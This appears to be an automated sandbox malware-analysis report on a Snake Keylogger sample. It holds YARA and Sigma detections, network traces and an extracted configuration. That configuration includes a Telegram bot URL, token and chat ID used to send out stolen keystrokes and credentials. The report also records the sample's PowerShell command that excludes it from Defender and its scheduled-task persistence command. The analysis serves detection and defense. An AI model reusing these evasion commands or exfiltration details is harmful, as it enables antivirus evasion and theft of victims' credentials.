15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1be16:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3be36:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5bc56:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b048:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b068:$a3: \Google\Chrome\User Data\Default\Login Data 0x5ae88:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b47b:$a4: \Orbitum\User Data\Default\Login Data 0x3b49b:$a4: \Orbitum\User Data\Default\Login Data 0x5b2bb:$a4: \Orbitum\User Data\Default\Login Data 0x1c4ba:$a5: \Kometa\User Data\Default\Login Data 0x3c4da:$a5: \Kometa\User Data\Default\Login Data 0x5c2fa:$a5: \Kometa\User Data\Default\Login Data
15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15093:$s1: UnHook 0x350b3:$s1: UnHook 0x54ed3:$s1: UnHook 0x1509a:$s2: SetHook 0x350ba:$s2: SetHook 0x54eda:$s2: SetHook 0x150a2:$s3: CallNextHook 0x350c2:$s3: CallNextHook 0x54ee2:$s3: CallNextHook 0x150af:$s4: _hook 0x350cf:$s4: _hook 0x54eef:$s4: _hook
15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19460:$x1: $%SMTPDV$ 0x39480:$x1: $%SMTPDV$ 0x592a0:$x1: $%SMTPDV$ 0x17e44:$x2: $#TheHashHere%& 0x37e64:$x2: $#TheHashHere%& 0x57c84:$x2: $#TheHashHere%& 0x19408:$x3: %FTPDV$ 0x39428:$x3: %FTPDV$ 0x59248:$x3: %FTPDV$ 0x17de4:$x4: $%TelegramDv$ 0x37e04:$x4: $%TelegramDv$ 0x57c24:$x4: $%TelegramDv$ 0x15705:$x5: KeyLoggerEventArgs 0x15a9a:$x5: KeyLoggerEventArgs 0x35725:$x5: KeyLoggerEventArgs 0x35aba:$x5: KeyLoggerEventArgs 0x55545:$x5: KeyLoggerEventArgs 0x558da:$x5: KeyLoggerEventArgs 0x1942c:$m2: Clipboard Logs ID 0x1966a:$m2: Screenshot Logs ID 0x1977a:$m2: keystroke Logs ID
4.2.file.exe.37f17a0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.file.exe.37f17a0.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.file.exe.37f17a0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x144be:$a1: get_encryptedPassword 0x344de:$a1: get_encryptedPassword 0x542fe:$a1: get_encryptedPassword 0x147a2:$a2: get_encryptedUsername 0x347c2:$a2: get_encryptedUsername 0x545e2:$a2: get_encryptedUsername 0x142ca:$a3: get_timePasswordChanged 0x342ea:$a3: get_timePasswordChanged 0x5410a:$a3: get_timePasswordChanged 0x143c5:$a4: get_passwordField 0x343e5:$a4: get_passwordField 0x54205:$a4: get_passwordField 0x144d4:$a5: set_encryptedPassword 0x344f4:$a5: set_encryptedPassword 0x54314:$a5: set_encryptedPassword 0x15b37:$a7: get_logins 0x35b57:$a7: get_logins 0x55977:$a7: get_logins 0x15a9a:$a10: KeyLoggerEventArgs 0x35aba:$a10: KeyLoggerEventArgs 0x558da:$a10: KeyLoggerEventArgs
4.2.file.exe.37f17a0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15093:$s1: UnHook 0x350b3:$s1: UnHook 0x54ed3:$s1: UnHook 0x1509a:$s2: SetHook 0x350ba:$s2: SetHook 0x54eda:$s2: SetHook 0x150a2:$s3: CallNextHook 0x350c2:$s3: CallNextHook 0x54ee2:$s3: CallNextHook 0x150af:$s4: _hook 0x350cf:$s4: _hook 0x54eef:$s4: _hook
4.2.file.exe.37f17a0.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19460:$x1: $%SMTPDV$ 0x39480:$x1: $%SMTPDV$ 0x592a0:$x1: $%SMTPDV$ 0x17e44:$x2: $#TheHashHere%& 0x37e64:$x2: $#TheHashHere%& 0x57c84:$x2: $#TheHashHere%& 0x19408:$x3: %FTPDV$ 0x39428:$x3: %FTPDV$ 0x59248:$x3: %FTPDV$ 0x17de4:$x4: $%TelegramDv$ 0x37e04:$x4: $%TelegramDv$ 0x57c24:$x4: $%TelegramDv$ 0x15705:$x5: KeyLoggerEventArgs 0x15a9a:$x5: KeyLoggerEventArgs 0x35725:$x5: KeyLoggerEventArgs 0x35aba:$x5: KeyLoggerEventArgs 0x55545:$x5: KeyLoggerEventArgs 0x558da:$x5: KeyLoggerEventArgs 0x1942c:$m2: Clipboard Logs ID 0x1966a:$m2: Screenshot Logs ID 0x1977a:$m2: keystroke Logs ID
4.2.file.exe.38117c0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.file.exe.38117c0.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.file.exe.38117c0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x144be:$a1: get_encryptedPassword 0x342de:$a1: get_encryptedPassword 0x147a2:$a2: get_encryptedUsername 0x345c2:$a2: get_encryptedUsername 0x142ca:$a3: get_timePasswordChanged 0x340ea:$a3: get_timePasswordChanged 0x143c5:$a4: get_passwordField 0x341e5:$a4: get_passwordField 0x144d4:$a5: set_encryptedPassword 0x342f4:$a5: set_encryptedPassword 0x15b37:$a7: get_logins 0x35957:$a7: get_logins 0x15a9a:$a10: KeyLoggerEventArgs 0x358ba:$a10: KeyLoggerEventArgs 0x15705:$a11: KeyLoggerEventArgsEventHandler 0x35525:$a11: KeyLoggerEventArgsEventHandler
4.2.file.exe.38117c0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15093:$s1: UnHook 0x34eb3:$s1: UnHook 0x1509a:$s2: SetHook 0x34eba:$s2: SetHook 0x150a2:$s3: CallNextHook 0x34ec2:$s3: CallNextHook 0x150af:$s4: _hook 0x34ecf:$s4: _hook
4.2.file.exe.38117c0.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19460:$x1: $%SMTPDV$ 0x39280:$x1: $%SMTPDV$ 0x17e44:$x2: $#TheHashHere%& 0x37c64:$x2: $#TheHashHere%& 0x19408:$x3: %FTPDV$ 0x39228:$x3: %FTPDV$ 0x17de4:$x4: $%TelegramDv$ 0x37c04:$x4: $%TelegramDv$ 0x15705:$x5: KeyLoggerEventArgs 0x15a9a:$x5: KeyLoggerEventArgs 0x35525:$x5: KeyLoggerEventArgs 0x358ba:$x5: KeyLoggerEventArgs 0x1942c:$m2: Clipboard Logs ID 0x1966a:$m2: Screenshot Logs ID 0x1977a:$m2: keystroke Logs ID 0x3924c:$m2: Clipboard Logs ID 0x3948a:$m2: Screenshot Logs ID 0x3959a:$m2: keystroke Logs ID 0x19a54:$m3: SnakePW 0x39874:$m3: SnakePW 0x19642:$m4: \SnakeKeylogger\
Click to see the 43 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7544, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7788, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmpAA33.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmpAA33.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\rXcourOVPD.exe, ParentImage: C:\Users\user\AppData\Roaming\rXcourOVPD.exe, ParentProcessId: 6576, ParentProcessName: rXcourOVPD.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmpAA33.tmp", ProcessId: 7200, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7544, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp", ProcessId: 8048, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7544, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7788, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7544, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp", ProcessId: 8048, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T17:58:05.204248+0100	2803305	3	Unknown Traffic	192.168.2.11	49725	172.67.177.134	443	TCP
2024-12-13T17:58:07.597260+0100	2803305	3	Unknown Traffic	192.168.2.11	49733	172.67.177.134	443	TCP
2024-12-13T17:58:10.858250+0100	2803305	3	Unknown Traffic	192.168.2.11	49747	172.67.177.134	443	TCP
2024-12-13T17:58:25.280469+0100	2803305	3	Unknown Traffic	192.168.2.11	49797	172.67.177.134	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T17:58:01.232447+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49711	132.226.8.169	80	TCP
2024-12-13T17:58:03.638572+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49711	132.226.8.169	80	TCP
2024-12-13T17:58:03.716713+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49718	132.226.8.169	80	TCP
2024-12-13T17:58:05.966712+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49718	132.226.8.169	80	TCP
2024-12-13T17:58:07.451077+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49732	132.226.8.169	80	TCP
2024-12-13T17:58:09.216680+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49740	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000014.00000002.3762642230.0000000002A91000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7329625827:AAFusOMtNxAA4AfTt7YzeN1zaE4Sm-WxFiw/sendMessage?chat_id=8096159140", "Token": "7329625827:AAFusOMtNxAA4AfTt7YzeN1zaE4Sm-WxFiw", "Chat_id": "8096159140", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe

ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.11:49719 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.11:49726 version: TLS 1.0

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0B3FAFE9h	4_2_0B3FA9A6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 02BFFA39h	14_2_02BFF778
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 02BFE61Fh	14_2_02BFE431
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 02BFEFA9h	14_2_02BFE431
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_02BFD7F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 059615D8h	14_2_05961506
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 05961011h	14_2_05960D60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596D011h	14_2_0596CD68
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596F729h	14_2_0596F480
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596C761h	14_2_0596C4B8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 05960751h	14_2_059604A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596BEB1h	14_2_0596BC08
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596BA59h	14_2_0596B7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596B1A9h	14_2_0596AF00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596EA21h	14_2_0596E778
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596E171h	14_2_0596DEC8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596D8C1h	14_2_0596D618
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 059615D8h	14_2_059611B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 059615D8h	14_2_059611C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596D469h	14_2_0596D1C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596CBB9h	14_2_0596C910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 05960BB1h	14_2_05960900
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596FB81h	14_2_0596F8D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596F2D1h	14_2_0596F028
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 059602F1h	14_2_05960040
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596C309h	14_2_0596C060
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596EE79h	14_2_0596EBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596E5C9h	14_2_0596E320
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596B601h	14_2_0596B358
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0596DD19h	14_2_0596DA70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A47BF5h	14_2_06A478B8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A44A39h	14_2_06A44790
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A46A01h	14_2_06A46758
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A45741h	14_2_06A45498
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A40741h	14_2_06A40498
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A47709h	14_2_06A47460
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A45FF1h	14_2_06A45D48
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A46E59h	14_2_06A46BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A44E91h	14_2_06A44BE8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A445B9h	14_2_06A44310
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A45B99h	14_2_06A458F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A40B99h	14_2_06A408F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A472B1h	14_2_06A47008
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A402E9h	14_2_06A40040
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A452E9h	14_2_06A45040
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 06A46473h	14_2_06A461C8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 0B7D0BA9h	15_2_0B7D0566
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 00E4E61Fh	20_2_00E4E431
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 00E4EFA9h	20_2_00E4E431
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 00E4FA39h	20_2_00E4F778
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_00E4E005
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_00E4D7F0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_00E4DE23
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05037BF5h	20_2_050378B8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05035FF1h	20_2_05035D48
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05037709h	20_2_05037460
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05035741h	20_2_05035498
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05030741h	20_2_05030498
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05036A01h	20_2_05036758
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05034A39h	20_2_05034790
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05036473h	20_2_050361C8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 050372B1h	20_2_05037008
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 050302E9h	20_2_05030040
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 050352E9h	20_2_05035040
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05035B99h	20_2_050358F0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05030B99h	20_2_050308F0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 050345B9h	20_2_05034310
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05036E59h	20_2_05036BB0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 4x nop then jmp 05034E91h	20_2_05034BE8

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.37f17a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.38117c0.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49740 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49718 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49732 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49711 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49733 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49725 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49797 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49747 -> 172.67.177.134:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
